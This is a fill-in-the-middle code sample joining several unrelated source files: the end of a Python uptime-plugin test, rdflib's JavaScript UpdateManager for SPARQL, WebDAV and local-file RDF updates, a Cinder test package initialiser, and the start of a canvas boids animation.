class UptimeTestCase(unittest.TestCase):
def test(self):
plugin = Uptime()
self.assertEqual('%d days %H:%M:%S up', plugin.full_format)
self.assertEqual('%dd %H:%M up', plugin.short_format)
@mock.patch('pi3bar.plugins.uptime.get_uptime_seconds')
def test_cycle(self, mock_get_uptime_seconds):
plugin = Uptime()
mock_get_uptime_seconds.return_value = 49020
plugin.cycle()
self.assertEqual('0 days 13:37:00 up', plugin.full_text)
self.assertEqual('0d 13:37 up', plugin.short_text)<|fim▁end|>
|
m = mock.mock_open(read_data='5')
|
<|file_name|>update-manager.js<|end_file_name|><|fim▁begin|>// Joe Presbrey <[email protected]>
// 2007-07-15
// 2010-08-08 TimBL folded in Kenny's WEBDAV
// 2010-12-07 TimBL addred local file write code
const docpart = require('./uri').docpart
const Fetcher = require('./fetcher')
const graph = require('./data-factory').graph
import IndexedFormula from './indexed-formula'
const namedNode = require('./data-factory').namedNode
const Namespace = require('./namespace')
const Serializer = require('./serializer')
const uriJoin = require('./uri').join
const Util = require('./util')
var UpdateManager = (function () {
var sparql = function (store) {
this.store = store
if (store.updater) {
throw new Error("You can't have two UpdateManagers for the same store")
}
if (!store.fetcher) { // The store must also/already have a fetcher
new Fetcher(store)
}
store.updater = this
this.ifps = {}
this.fps = {}
this.ns = {}
this.ns.link = Namespace('http://www.w3.org/2007/ont/link#')
this.ns.http = Namespace('http://www.w3.org/2007/ont/http#')
this.ns.httph = Namespace('http://www.w3.org/2007/ont/httph#')
this.ns.ldp = Namespace('http://www.w3.org/ns/ldp#')
this.ns.rdf = Namespace('http://www.w3.org/1999/02/22-rdf-syntax-ns#')
this.ns.rdfs = Namespace('http://www.w3.org/2000/01/rdf-schema#')
this.ns.rdf = Namespace('http://www.w3.org/1999/02/22-rdf-syntax-ns#')
this.ns.owl = Namespace('http://www.w3.org/2002/07/owl#')
this.patchControl = [] // index of objects fro coordinating incomng and outgoing patches
}
sparql.prototype.patchControlFor = function (doc) {
if (!this.patchControl[doc.uri]) {
this.patchControl[doc.uri] = []
}
return this.patchControl[doc.uri]
}
// Returns The method string SPARQL or DAV or LOCALFILE or false if known, undefined if not known.
//
// Files have to have a specific annotaton that they are machine written, for safety.
// We don't actually check for write access on files.
//
sparql.prototype.editable = function (uri, kb) {
if (!uri) {
return false // Eg subject is bnode, no known doc to write to
}
if (!kb) {
kb = this.store
}
if (uri.slice(0, 8) === 'file:///') {
if (kb.holds(
kb.sym(uri),
namedNode('http://www.w3.org/1999/02/22-rdf-syntax-ns#type'),
namedNode('http://www.w3.org/2007/ont/link#MachineEditableDocument')
)) {
return 'LOCALFILE'
}
var sts = kb.statementsMatching(kb.sym(uri), undefined, undefined)
console.log('sparql.editable: Not MachineEditableDocument file ' +
uri + '\n')
console.log(sts.map(function (x) {
return x.toNT()
}).join('\n'))
return false
// @@ Would be nifty of course to see whether we actually have write acess first.
}
var request
var definitive = false
var requests = kb.each(undefined, this.ns.link('requestedURI'),
docpart(uri))
// Hack for the moment @@@@ 2016-02-12
if (kb.holds(namedNode(uri), this.ns.rdf('type'), this.ns.ldp('Resource'))) {
return 'SPARQL'
}
var i
var method
for (var r = 0; r < requests.length; r++) {
request = requests[r]
if (request !== undefined) {
var response = kb.any(request, this.ns.link('response'))
if (request !== undefined) {
var acceptPatch = kb.each(response, this.ns.httph('accept-patch'))
if (acceptPatch.length) {
for (i = 0; i < acceptPatch.length; i++) {
method = acceptPatch[i].value.trim()
if (method.indexOf('application/sparql-update') >= 0) return 'SPARQL'
}
}
var author_via = kb.each(response, this.ns.httph('ms-author-via'))
if (author_via.length) {
for (i = 0; i < author_via.length; i++) {
method = author_via[i].value.trim()
if (method.indexOf('SPARQL') >= 0) {
return 'SPARQL'
}
if (method.indexOf('DAV') >= 0) {
return 'DAV'
}
}
}
var status = kb.each(response, this.ns.http('status'))
if (status.length) {
for (i = 0; i < status.length; i++) {
if (status[i] === 200 || status[i] === 404) {
definitive = true
// return false // A definitive answer
}
}
}
} else {
console.log('sparql.editable: No response for ' + uri + '\n')
}
}
}
if (requests.length === 0) {
console.log('sparql.editable: No request for ' + uri + '\n')
} else {
if (definitive) {
return false // We have got a request and it did NOT say editable => not editable
}<|fim▁hole|>
// ///////// The identification of bnodes
sparql.prototype.anonymize = function (obj) {
return (obj.toNT().substr(0, 2) === '_:' && this._mentioned(obj))
? '?' + obj.toNT().substr(2)
: obj.toNT()
}
sparql.prototype.anonymizeNT = function (stmt) {
return this.anonymize(stmt.subject) + ' ' +
this.anonymize(stmt.predicate) + ' ' +
this.anonymize(stmt.object) + ' .'
}
// A list of all bnodes occuring in a statement
sparql.prototype._statement_bnodes = function (st) {
return [st.subject, st.predicate, st.object].filter(function (x) {
return x.isBlank
})
}
// A list of all bnodes occuring in a list of statements
sparql.prototype._statement_array_bnodes = function (sts) {
var bnodes = []
for (var i = 0; i < sts.length; i++) {
bnodes = bnodes.concat(this._statement_bnodes(sts[i]))
}
bnodes.sort() // in place sort - result may have duplicates
var bnodes2 = []
for (var j = 0; j < bnodes.length; j++) {
if (j === 0 || !bnodes[j].sameTerm(bnodes[j - 1])) {
bnodes2.push(bnodes[j])
}
}
return bnodes2
}
sparql.prototype._cache_ifps = function () {
// Make a cached list of [Inverse-]Functional properties
// Call this once before calling context_statements
this.ifps = {}
var a = this.store.each(undefined, this.ns.rdf('type'), this.ns.owl('InverseFunctionalProperty'))
for (var i = 0; i < a.length; i++) {
this.ifps[a[i].uri] = true
}
this.fps = {}
a = this.store.each(undefined, this.ns.rdf('type'), this.ns.owl('FunctionalProperty'))
for (i = 0; i < a.length; i++) {
this.fps[a[i].uri] = true
}
}
// Returns a context to bind a given node, up to a given depth
sparql.prototype._bnode_context2 = function (x, source, depth) {
// Return a list of statements which indirectly identify a node
// Depth > 1 if try further indirection.
// Return array of statements (possibly empty), or null if failure
var sts = this.store.statementsMatching(undefined, undefined, x, source) // incoming links
var y
var res
for (var i = 0; i < sts.length; i++) {
if (this.fps[sts[i].predicate.uri]) {
y = sts[i].subject
if (!y.isBlank) {
return [ sts[i] ]
}
if (depth) {
res = this._bnode_context2(y, source, depth - 1)
if (res) {
return res.concat([ sts[i] ])
}
}
}
}
// outgoing links
sts = this.store.statementsMatching(x, undefined, undefined, source)
for (i = 0; i < sts.length; i++) {
if (this.ifps[sts[i].predicate.uri]) {
y = sts[i].object
if (!y.isBlank) {
return [ sts[i] ]
}
if (depth) {
res = this._bnode_context2(y, source, depth - 1)
if (res) {
return res.concat([ sts[i] ])
}
}
}
}
return null // Failure
}
// Returns the smallest context to bind a given single bnode
sparql.prototype._bnode_context_1 = function (x, source) {
// Return a list of statements which indirectly identify a node
// Breadth-first
var self = this
for (var depth = 0; depth < 3; depth++) { // Try simple first
var con = this._bnode_context2(x, source, depth)
if (con !== null) return con
}
// If we can't guarantee unique with logic just send all info about node
return this.store.connectedStatements(x, source) // was:
// throw new Error('Unable to uniquely identify bnode: ' + x.toNT())
}
sparql.prototype._mentioned = function (x) {
return (this.store.statementsMatching(x).length !== 0) || // Don't pin fresh bnodes
(this.store.statementsMatching(undefined, x).length !== 0) ||
(this.store.statementsMatching(undefined, undefined, x).length !== 0)
}
sparql.prototype._bnode_context = function (bnodes, doc) {
var context = []
if (bnodes.length) {
this._cache_ifps()
for (var i = 0; i < bnodes.length; i++) { // Does this occur in old graph?
var bnode = bnodes[i]
if (!this._mentioned(bnode)) continue
context = context.concat(this._bnode_context_1(bnode, doc))
}
}
return context
}
/* Weird code does not make sense -- some code corruption along the line -- st undefined -- weird
sparql.prototype._bnode_context = function(bnodes) {
var context = []
if (bnodes.length) {
if (this.store.statementsMatching(st.subject.isBlank?undefined:st.subject,
st.predicate.isBlank?undefined:st.predicate,
st.object.isBlank?undefined:st.object,
st.why).length <= 1) {
context = context.concat(st)
} else {
this._cache_ifps()
for (x in bnodes) {
context = context.concat(this._bnode_context_1(bnodes[x], st.why))
}
}
}
return context
}
*/
// Returns the best context for a single statement
sparql.prototype._statement_context = function (st) {
var bnodes = this._statement_bnodes(st)
return this._bnode_context(bnodes, st.why)
}
sparql.prototype._context_where = function (context) {
var sparql = this
return (!context || context.length === 0)
? ''
: 'WHERE { ' +
context.map(function (x) {
return sparql.anonymizeNT(x)
}).join('\n') + ' }\n'
}
sparql.prototype._fire = function (uri, query, callback) {
if (!uri) {
throw new Error('No URI given for remote editing operation: ' + query)
}
console.log('sparql: sending update to <' + uri + '>')
var xhr = Util.XMLHTTPFactory()
xhr.options = {}
xhr.onreadystatechange = function () {
// dump("SPARQL update ready state for <"+uri+"> readyState="+xhr.readyState+"\n"+query+"\n")
if (xhr.readyState === 4) {
var success = (!xhr.status || (xhr.status >= 200 && xhr.status < 300))
if (!success) {
console.log('sparql: update failed for <' + uri + '> status=' +
xhr.status + ', ' + xhr.statusText + ', body length=' + xhr.responseText.length + '\n for query: ' + query)
} else {
console.log('sparql: update Ok for <' + uri + '>')
}
callback(uri, success, xhr.responseText, xhr)
}
}
xhr.open('PATCH', uri, true) // async=true
xhr.setRequestHeader('Content-type', 'application/sparql-update')
xhr.send(query)
}
// This does NOT update the statement.
// It returns an object whcih includes
// function which can be used to change the object of the statement.
//
sparql.prototype.update_statement = function (statement) {
if (statement && !statement.why) {
return
}
var sparql = this
var context = this._statement_context(statement)
return {
statement: statement ? [statement.subject, statement.predicate, statement.object, statement.why] : undefined,
statementNT: statement ? this.anonymizeNT(statement) : undefined,
where: sparql._context_where(context),
set_object: function (obj, callback) {
var query = this.where
query += 'DELETE DATA { ' + this.statementNT + ' } ;\n'
query += 'INSERT DATA { ' +
this.anonymize(this.statement[0]) + ' ' +
this.anonymize(this.statement[1]) + ' ' +
this.anonymize(obj) + ' ' + ' . }\n'
sparql._fire(this.statement[3].uri, query, callback)
}
}
}
sparql.prototype.insert_statement = function (st, callback) {
var st0 = st instanceof Array ? st[0] : st
var query = this._context_where(this._statement_context(st0))
if (st instanceof Array) {
var stText = ''
for (var i = 0; i < st.length; i++) stText += st[i] + '\n'
query += 'INSERT DATA { ' + stText + ' }\n'
} else {
query += 'INSERT DATA { ' +
this.anonymize(st.subject) + ' ' +
this.anonymize(st.predicate) + ' ' +
this.anonymize(st.object) + ' ' + ' . }\n'
}
this._fire(st0.why.uri, query, callback)
}
sparql.prototype.delete_statement = function (st, callback) {
var st0 = st instanceof Array ? st[0] : st
var query = this._context_where(this._statement_context(st0))
if (st instanceof Array) {
var stText = ''
for (var i = 0; i < st.length; i++) stText += st[i] + '\n'
query += 'DELETE DATA { ' + stText + ' }\n'
} else {
query += 'DELETE DATA { ' +
this.anonymize(st.subject) + ' ' +
this.anonymize(st.predicate) + ' ' +
this.anonymize(st.object) + ' ' + ' . }\n'
}
this._fire(st0.why.uri, query, callback)
}
// Request a now or future action to refresh changes coming downstream
//
// This is designed to allow the system to re-request the server version,
// when a websocket has pinged to say there are changes.
// If thewebsocket, by contrast, has sent a patch, then this may not be necessary.
// This may be called out of context so *this* cannot be used.
sparql.prototype.requestDownstreamAction = function (doc, action) {
var control = this.patchControlFor(doc)
if (!control.pendingUpstream) {
action(doc)
} else {
if (control.downstreamAction) {
if (control.downstreamAction === action) {
return
} else {
throw new Error("Can't wait for > 1 differnt downstream actions")
}
} else {
control.downstreamAction = action
}
}
}
// We want to start counting websockt notifications
// to distinguish the ones from others from our own.
sparql.prototype.clearUpstreamCount = function (doc) {
var control = this.patchControlFor(doc)
control.upstreamCount = 0
}
sparql.prototype.getUpdatesVia = function (doc) {
var linkHeaders = this.store.fetcher.getHeader(doc, 'updates-via')
if (!linkHeaders || !linkHeaders.length) return null
return linkHeaders[0].trim()
}
sparql.prototype.addDownstreamChangeListener = function (doc, listener) {
var control = this.patchControlFor(doc)
if (!control.downstreamChangeListeners) control.downstreamChangeListeners = []
control.downstreamChangeListeners.push(listener)
var self = this
this.setRefreshHandler(doc, function(doc){ // a function not a method
self.reloadAndSync(doc)
})
}
sparql.prototype.reloadAndSync = function (doc) {
var control = this.patchControlFor(doc)
var updater = this
if (control.reloading) {
console.log(' Already reloading - stop')
return // once only needed
}
control.reloading = true
var retryTimeout = 1000 // ms
var tryReload = function () {
console.log('try reload - timeout = ' + retryTimeout)
updater.reload(updater.store, doc, function (ok, message, xhr) {
control.reloading = false
if (ok) {
if (control.downstreamChangeListeners) {
for (var i = 0; i < control.downstreamChangeListeners.length; i++) {
console.log(' Calling downstream listener ' + i)
control.downstreamChangeListeners[i]()
}
}
} else {
if (xhr.status === 0) {
console.log('Network error refreshing the data. Retrying in ' +
retryTimeout / 1000)
control.reloading = true
retryTimeout = retryTimeout * 2
setTimeout(tryReload, retryTimeout)
} else {
console.log('Error ' + xhr.status + 'refreshing the data:' +
message + '. Stopped' + doc)
}
}
})
}
tryReload()
}
// Set up websocket to listen on
//
// There is coordination between upstream changes and downstream ones
// so that a reload is not done in the middle of an upsteeam patch.
// If you usie this API then you get called when a change happens, and you
// have to reload the file yourself, and then refresh the UI.
// Alternative is addDownstreamChangeListener(), where you do not
// have to do the reload yourslf. Do mot mix them.
//
// kb contains the HTTP metadata from prefvious operations
//
sparql.prototype.setRefreshHandler = function (doc, handler) {
var wssURI = this.getUpdatesVia(doc) // relative
// var kb = this.store
var theHandler = handler
var self = this
var updater = this
var retryTimeout = 1500 // *2 will be 3 Seconds, 6, 12, etc
var retries = 0
if (!wssURI) {
console.log('Server doies not support live updates thoughUpdates-Via :-(')
return false
}
wssURI = uriJoin(wssURI, doc.uri)
wssURI = wssURI.replace(/^http:/, 'ws:').replace(/^https:/, 'wss:')
console.log('Web socket URI ' + wssURI)
var openWebsocket = function () {
// From https://github.com/solid/solid-spec#live-updates
var socket
if (typeof WebSocket !== 'undefined') {
socket = new WebSocket(wssURI)
} else if (typeof Services !== 'undefined') { // Firefox add on http://stackoverflow.com/questions/24244886/is-websocket-supported-in-firefox-for-android-addons
socket = (Services.wm.getMostRecentWindow('navigator:browser').WebSocket)(wssURI)
} else if (typeof window !== 'undefined' && window.WebSocket) {
socket = window.WebSocket(wssURI)
} else {
console.log('Live update disabled, as WebSocket not supported by platform :-(')
return
}
socket.onopen = function () {
console.log(' websocket open')
retryTimeout = 1500 // reset timeout to fast on success
this.send('sub ' + doc.uri)
if (retries) {
console.log('Web socket has been down, better check for any news.')
updater.requestDownstreamAction(doc, theHandler)
}
}
var control = self.patchControlFor(doc)
control.upstreamCount = 0
// https://developer.mozilla.org/en-US/docs/Web/API/CloseEvent
//
// 1000 CLOSE_NORMAL Normal closure; the connection successfully completed whatever purpose for which it was created.
// 1001 CLOSE_GOING_AWAY The endpoint is going away, either
// because of a server failure or because the browser is navigating away from the page that opened the connection.
// 1002 CLOSE_PROTOCOL_ERROR The endpoint is terminating the connection due to a protocol error.
// 1003 CLOSE_UNSUPPORTED The connection is being terminated because the endpoint
// received data of a type it cannot accept (for example, a text-only endpoint received binary data).
// 1004 Reserved. A meaning might be defined in the future.
// 1005 CLOSE_NO_STATUS Reserved. Indicates that no status code was provided even though one was expected.
// 1006 CLOSE_ABNORMAL Reserved. Used to indicate that a connection was closed abnormally (
//
//
socket.onclose = function (event) {
console.log('*** Websocket closed with code ' + event.code +
", reason '" + event.reason + "' clean = " + event.clean)
retryTimeout *= 2
retries += 1
console.log('Retrying in ' + retryTimeout + 'ms') // (ask user?)
setTimeout(function () {
console.log('Trying websocket again')
openWebsocket()
}, retryTimeout)
}
socket.onmessage = function (msg) {
if (msg.data && msg.data.slice(0, 3) === 'pub') {
if ('upstreamCount' in control) {
control.upstreamCount -= 1
if (control.upstreamCount >= 0) {
console.log('just an echo: ' + control.upstreamCount)
return // Just an echo
}
}
console.log('Assume a real downstream change: ' + control.upstreamCount + ' -> 0')
control.upstreamCount = 0
self.requestDownstreamAction(doc, theHandler)
}
}
} // openWebsocket
openWebsocket()
return true
}
// This high-level function updates the local store iff the web is changed successfully.
//
// - deletions, insertions may be undefined or single statements or lists or formulae.
// (may contain bnodes which can be indirectly identified by a where clause)
//
// - callback is called as callback(uri, success, errorbody, xhr)
//
sparql.prototype.update = function (deletions, insertions, callback) {
try {
var kb = this.store
var ds = !deletions ? []
: deletions instanceof IndexedFormula ? deletions.statements
: deletions instanceof Array ? deletions : [ deletions ]
var is = !insertions ? []
: insertions instanceof IndexedFormula ? insertions.statements
: insertions instanceof Array ? insertions : [ insertions ]
if (!(ds instanceof Array)) {
throw new Error('Type Error ' + (typeof ds) + ': ' + ds)
}
if (!(is instanceof Array)) {
throw new Error('Type Error ' + (typeof is) + ': ' + is)
}
if (ds.length === 0 && is.length === 0) {
return callback(null, true) // success -- nothing needed to be done.
}
var doc = ds.length ? ds[0].why : is[0].why
var control = this.patchControlFor(doc)
var startTime = Date.now()
var props = ['subject', 'predicate', 'object', 'why']
var verbs = ['insert', 'delete']
var clauses = { 'delete': ds, 'insert': is }
verbs.map(function (verb) {
clauses[verb].map(function (st) {
if (!doc.sameTerm(st.why)) {
throw new Error('update: destination ' + doc +
' inconsistent with delete quad ' + st.why)
}
props.map(function (prop) {
if (typeof st[prop] === 'undefined') {
throw new Error('update: undefined ' + prop + ' of statement.')
}
})
})
})
var protocol = this.editable(doc.uri, kb)
if (!protocol) {
throw new Error("Can't make changes in uneditable " + doc)
}
var i
var newSts
var documentString
var sz
if (protocol.indexOf('SPARQL') >= 0) {
var bnodes = []
if (ds.length) bnodes = this._statement_array_bnodes(ds)
if (is.length) bnodes = bnodes.concat(this._statement_array_bnodes(is))
var context = this._bnode_context(bnodes, doc)
var whereClause = this._context_where(context)
var query = ''
if (whereClause.length) { // Is there a WHERE clause?
if (ds.length) {
query += 'DELETE { '
for (i = 0; i < ds.length; i++) {
query += this.anonymizeNT(ds[i]) + '\n'
}
query += ' }\n'
}
if (is.length) {
query += 'INSERT { '
for (i = 0; i < is.length; i++) {
query += this.anonymizeNT(is[i]) + '\n'
}
query += ' }\n'
}
query += whereClause
} else { // no where clause
if (ds.length) {
query += 'DELETE DATA { '
for (i = 0; i < ds.length; i++) {
query += this.anonymizeNT(ds[i]) + '\n'
}
query += ' } \n'
}
if (is.length) {
if (ds.length) query += ' ; '
query += 'INSERT DATA { '
for (i = 0; i < is.length; i++) {
query += this.anonymizeNT(is[i]) + '\n'
}
query += ' }\n'
}
}
// Track pending upstream patches until they have fnished their callback
control.pendingUpstream = control.pendingUpstream ? control.pendingUpstream + 1 : 1
if ('upstreamCount' in control) {
control.upstreamCount += 1 // count changes we originated ourselves
console.log('upstream count up to : ' + control.upstreamCount)
}
this._fire(doc.uri, query,
function (uri, success, body, xhr) {
xhr.elapsedTime_ms = Date.now() - startTime
console.log(' sparql: Return ' + (success ? 'success' : 'FAILURE ' + xhr.status) +
' elapsed ' + xhr.elapsedTime_ms + 'ms')
if (success) {
try {
kb.remove(ds)
} catch (e) {
success = false
body = 'Remote Ok BUT error deleting ' + ds.length + ' from store!!! ' + e
} // Add in any case -- help recover from weirdness??
for (var i = 0; i < is.length; i++) {
kb.add(is[i].subject, is[i].predicate, is[i].object, doc)
}
}
callback(uri, success, body, xhr)
control.pendingUpstream -= 1
// When upstream patches have been sent, reload state if downstream waiting
if (control.pendingUpstream === 0 && control.downstreamAction) {
var downstreamAction = control.downstreamAction
delete control.downstreamAction
console.log('delayed downstream action:')
downstreamAction(doc)
}
})
} else if (protocol.indexOf('DAV') >= 0) {
// The code below is derived from Kenny's UpdateCenter.js
documentString
var request = kb.any(doc, this.ns.link('request'))
if (!request) {
throw new Error('No record of our HTTP GET request for document: ' +
doc)
} // should not happen
var response = kb.any(request, this.ns.link('response'))
if (!response) {
return null // throw "No record HTTP GET response for document: "+doc
}
var content_type = kb.the(response, this.ns.httph('content-type')).value
// prepare contents of revised document
newSts = kb.statementsMatching(undefined, undefined, undefined, doc).slice() // copy!
for (i = 0; i < ds.length; i++) {
Util.RDFArrayRemove(newSts, ds[i])
}
for (i = 0; i < is.length; i++) {
newSts.push(is[i])
}
// serialize to te appropriate format
sz = Serializer(kb)
sz.suggestNamespaces(kb.namespaces)
sz.setBase(doc.uri) // ?? beware of this - kenny (why? tim)
switch (content_type) {
case 'application/rdf+xml':
documentString = sz.statementsToXML(newSts)
break
case 'text/n3':
case 'text/turtle':
case 'application/x-turtle': // Legacy
case 'application/n3': // Legacy
documentString = sz.statementsToN3(newSts)
break
default:
throw new Error('Content-type ' + content_type + ' not supported for data write')
}
// Write the new version back
var candidateTarget = kb.the(response, this.ns.httph('content-location'))
var targetURI
if (candidateTarget) {
targetURI = uriJoin(candidateTarget.value, targetURI)
}
var xhr = Util.XMLHTTPFactory()
xhr.options = {}
xhr.onreadystatechange = function () {
if (xhr.readyState === 4) {
// formula from sparqlUpdate.js, what about redirects?
var success = (!xhr.status || (xhr.status >= 200 && xhr.status < 300))
if (success) {
for (var i = 0; i < ds.length; i++) {
kb.remove(ds[i])
}
for (i = 0; i < is.length; i++) {
kb.add(is[i].subject, is[i].predicate, is[i].object, doc)
}
}
callback(doc.uri, success, xhr.responseText)
}
}
xhr.open('PUT', targetURI, true)
// assume the server does PUT content-negotiation.
xhr.setRequestHeader('Content-type', content_type) // OK?
xhr.send(documentString)
} else {
if (protocol.indexOf('LOCALFILE') >= 0) {
try {
console.log('Writing back to local file\n')
// See http://simon-jung.blogspot.com/2007/10/firefox-extension-file-io.html
// prepare contents of revised document
newSts = kb.statementsMatching(undefined, undefined, undefined, doc).slice() // copy!
for (i = 0; i < ds.length; i++) {
Util.RDFArrayRemove(newSts, ds[i])
}
for (i = 0; i < is.length; i++) {
newSts.push(is[i])
}
// serialize to the appropriate format
documentString
sz = Serializer(kb)
sz.suggestNamespaces(kb.namespaces)
sz.setBase(doc.uri) // ?? beware of this - kenny (why? tim)
var dot = doc.uri.lastIndexOf('.')
if (dot < 1) {
throw new Error('Rewriting file: No filename extension: ' + doc.uri)
}
var ext = doc.uri.slice(dot + 1)
switch (ext) {
case 'rdf':
case 'owl': // Just my experence ...@@ we should keep the format in which it was parsed
case 'xml':
documentString = sz.statementsToXML(newSts)
break
case 'n3':
case 'nt':
case 'ttl':
documentString = sz.statementsToN3(newSts)
break
default:
throw new Error('File extension .' + ext + ' not supported for data write')
}
// Write the new version back
// create component for file writing
console.log('Writing back: <<<' + documentString + '>>>')
var filename = doc.uri.slice(7) // chop off file:// leaving /path
// console.log("Writeback: Filename: "+filename+"\n")
var file = Components.classes['@mozilla.org/file/local;1']
.createInstance(Components.interfaces.nsILocalFile)
file.initWithPath(filename)
if (!file.exists()) {
throw new Error('Rewriting file <' + doc.uri +
'> but it does not exist!')
}
// {
// file.create( Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 420)
// }
// create file output stream and use write/create/truncate mode
// 0x02 writing, 0x08 create file, 0x20 truncate length if exist
var stream = Components.classes['@mozilla.org/network/file-output-stream;1']
.createInstance(Components.interfaces.nsIFileOutputStream)
// Various JS systems object to 0666 in struct mode as dangerous
stream.init(file, 0x02 | 0x08 | 0x20, parseInt('0666', 8), 0)
// write data to file then close output stream
stream.write(documentString, documentString.length)
stream.close()
for (i = 0; i < ds.length; i++) {
kb.remove(ds[i])
}
for (i = 0; i < is.length; i++) {
kb.add(is[i].subject, is[i].predicate, is[i].object, doc)
}
callback(doc.uri, true, '') // success!
} catch (e) {
callback(doc.uri, false,
'Exception trying to write back file <' + doc.uri + '>\n'
// + tabulator.Util.stackString(e))
)
}
} else {
throw new Error("Unhandled edit method: '" + protocol + "' for " + doc)
}
}
} catch (e) {
callback(undefined, false, 'Exception in update: ' + e + '\n' + $rdf.Util.stackString(e))
}
} // wnd update
// This suitable for an inital creation of a document
//
// data: string, or array of statements
//
sparql.prototype.put = function (doc, data, content_type, callback) {
var documentString
var kb = this.store
if (typeof data === typeof '') {
documentString = data
} else {
// serialize to te appropriate format
var sz = Serializer(kb)
sz.suggestNamespaces(kb.namespaces)
sz.setBase(doc.uri)
switch (content_type) {
case 'application/rdf+xml':
documentString = sz.statementsToXML(data)
break
case 'text/n3':
case 'text/turtle':
case 'application/x-turtle': // Legacy
case 'application/n3': // Legacy
documentString = sz.statementsToN3(data)
break
default:
throw new Error('Content-type ' + content_type +
' not supported for data PUT')
}
}
var xhr = Util.XMLHTTPFactory()
xhr.options = {}
xhr.onreadystatechange = function () {
if (xhr.readyState === 4) {
// formula from sparqlUpdate.js, what about redirects?
var success = (!xhr.status || (xhr.status >= 200 && xhr.status < 300))
if (success && typeof data !== 'string') {
data.map(function (st) {
kb.addStatement(st)
})
// kb.fetcher.requested[doc.uri] = true // as though fetched
}
if (success) {
delete kb.fetcher.nonexistant[doc.uri]
delete kb.fetcher.requested[doc.uri]
// @@ later we can fake it has been requestd if put gives us the header sand we save them.
}
callback(doc.uri, success, xhr.responseText, xhr)
}
}
xhr.open('PUT', doc.uri, true)
xhr.setRequestHeader('Content-type', content_type)
xhr.send(documentString)
}
// Reload a document.
//
// Fast and cheap, no metaata
// Measure times for the document
// Load it provisionally
// Don't delete the statemenst before the load, or it will leave a broken document
// in the meantime.
sparql.prototype.reload = function (kb, doc, callback) {
var startTime = Date.now()
// force sets no-cache and
kb.fetcher.nowOrWhenFetched(doc.uri, {force: true, noMeta: true, clearPreviousData: true}, function (ok, body, xhr) {
if (!ok) {
console.log(' ERROR reloading data: ' + body)
callback(false, 'Error reloading data: ' + body, xhr)
} else if (xhr.onErrorWasCalled || xhr.status !== 200) {
console.log(' Non-HTTP error reloading data! onErrorWasCalled=' +
xhr.onErrorWasCalled + ' status: ' + xhr.status)
callback(false, 'Non-HTTP error reloading data: ' + body, xhr)
} else {
var elapsedTime_ms = Date.now() - startTime
if (!doc.reloadTime_total) doc.reloadTime_total = 0
if (!doc.reloadTime_count) doc.reloadTime_count = 0
doc.reloadTime_total += elapsedTime_ms
doc.reloadTime_count += 1
console.log(' Fetch took ' + elapsedTime_ms + 'ms, av. of ' +
doc.reloadTime_count + ' = ' +
(doc.reloadTime_total / doc.reloadTime_count) + 'ms.')
callback(true)
}
})
}
sparql.prototype.oldReload = function (kb, doc, callback) {
var g2 = graph() // A separate store to hold the data as we load it
var f2 = fetcher(g2)
var startTime = Date.now()
// force sets no-cache and
f2.nowOrWhenFetched(doc.uri, {force: true, noMeta: true, clearPreviousData: true}, function (ok, body, xhr) {
if (!ok) {
console.log(' ERROR reloading data: ' + body)
callback(false, 'Error reloading data: ' + body, xhr)
} else if (xhr.onErrorWasCalled || xhr.status !== 200) {
console.log(' Non-HTTP error reloading data! onErrorWasCalled=' +
xhr.onErrorWasCalled + ' status: ' + xhr.status)
callback(false, 'Non-HTTP error reloading data: ' + body, xhr)
} else {
var sts1 = kb.statementsMatching(undefined, undefined, undefined, doc).slice() // Take a copy!!
var sts2 = g2.statementsMatching(undefined, undefined, undefined, doc).slice()
console.log(' replacing ' + sts1.length + ' with ' + sts2.length +
' out of total statements ' + kb.statements.length)
kb.remove(sts1)
kb.add(sts2)
var elapsedTime_ms = Date.now() - startTime
if (sts2.length === 0) {
console.log('????????????????? 0000000')
}
if (!doc.reloadTime_total) doc.reloadTime_total = 0
if (!doc.reloadTime_count) doc.reloadTime_count = 0
doc.reloadTime_total += elapsedTime_ms
doc.reloadTime_count += 1
console.log(' fetch took ' + elapsedTime_ms + 'ms, av. of ' + doc.reloadTime_count + ' = ' +
(doc.reloadTime_total / doc.reloadTime_count) + 'ms.')
callback(true)
}
})
}
return sparql
})()
module.exports = UpdateManager<|fim▁end|>
|
}
console.log('sparql.editable: inconclusive for ' + uri + '\n')
return undefined // We don't know (yet) as we haven't had a response (yet)
}
|
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.<|fim▁hole|># a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
:mod:`cinder.tests` -- Cinder Unittests
=====================================================
.. automodule:: cinder.tests
:platform: Unix
.. moduleauthor:: Jesse Andrews <[email protected]>
.. moduleauthor:: Devin Carlen <[email protected]>
.. moduleauthor:: Vishvananda Ishaya <[email protected]>
.. moduleauthor:: Joshua McKenty <[email protected]>
.. moduleauthor:: Manish Singh <[email protected]>
.. moduleauthor:: Andy Smith <[email protected]>
"""
import eventlet
eventlet.monkey_patch()
# See http://code.google.com/p/python-nose/issues/detail?id=373
# The code below enables nosetests to work with i18n _() blocks
import __builtin__
setattr(__builtin__, '_', lambda x: x)<|fim▁end|>
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
|
<|file_name|>boid.js<|end_file_name|><|fim▁begin|>var width = window.innerWidth,
height = window.innerHeight,
boids = [],
destination,
canvas,
context;
const MAX_NUMBER = 100;
const MAX_SPEED = 1;
const radius = 5;
init();
animation();
function init(){
canvas = document.getElementById('canvas'),
context = canvas.getContext( "2d" );
canvas.width = width;
canvas.height = height;
destination = {
x:Math.random()*width,
y:Math.random()*height
};
for (var i = 0; i <MAX_NUMBER; i++) {
boids[i] = new Boid();
};
}
var _animation;
function animation(){
_animation = requestAnimationFrame(animation);
context.clearRect(0,0,width,height);
for (var i = 0; i < boids.length; i++) {
boids[i].rule1();
boids[i].rule2();
boids[i].rule3();
boids[i].rule4();
boids[i].rule5();
boids[i].rule6();
var nowSpeed = Math.sqrt(boids[i].vx * boids[i].vx + boids[i].vy * boids[i].vy );
if(nowSpeed > MAX_SPEED){
boids[i].vx *= MAX_SPEED / nowSpeed;
boids[i].vy *= MAX_SPEED / nowSpeed;
}
boids[i].x += boids[i].vx;
boids[i].y += boids[i].vy;
drawCircle(boids[i].x,boids[i].y);
